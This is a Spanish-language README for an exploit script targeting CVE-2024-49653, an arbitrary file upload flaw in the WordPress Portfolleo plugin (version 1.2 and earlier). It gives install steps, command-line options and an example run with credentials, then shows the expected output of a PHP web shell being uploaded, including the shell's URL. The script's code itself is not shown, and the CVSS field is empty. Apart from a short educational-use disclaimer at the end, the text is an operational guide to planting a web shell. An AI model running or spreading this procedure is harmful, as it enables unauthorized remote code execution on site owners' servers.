
Plugin Portfolleo de WordPress <= 1.2 - Vulnerabilidad de carga de archivos arbitraria
Título: Plugin Portfolleo de WordPress <= 1.2 - Vulnerabilidad de subida arbitraria de archivos
Descripción:
Vulnerabilidad de subida sin restricciones de archivos con tipo peligroso en James Eggers Portfolleo portfolleo que permite subir un web shell a un servidor web. Este problema afecta a Portfolleo desde la versión n/a hasta la 1.2.
Más información:
Puntuación CVSS:
Este script explota la vulnerabilidad de subida arbitraria de archivos en el plugin Portfolleo de WordPress (versiones <= 1.2) para subir un web shell.
Necesitas tener instalado lo siguiente para ejecutar el script:
requestsbeautifulsoup4Puedes instalar las librerías necesarias usando:
pip install requests beautifulsoup4
Ejecuta el script con las siguientes opciones:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
Si el script se ejecuta correctamente, deberías ver la siguiente salida:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
Este script tiene fines exclusivamente educativos. El autor no respalda el uso de este script para actividades ilegales. Úsalo de manera responsable y solo en sistemas con permiso explícito para probar.
Por: Nxploited | Khaled Alenazi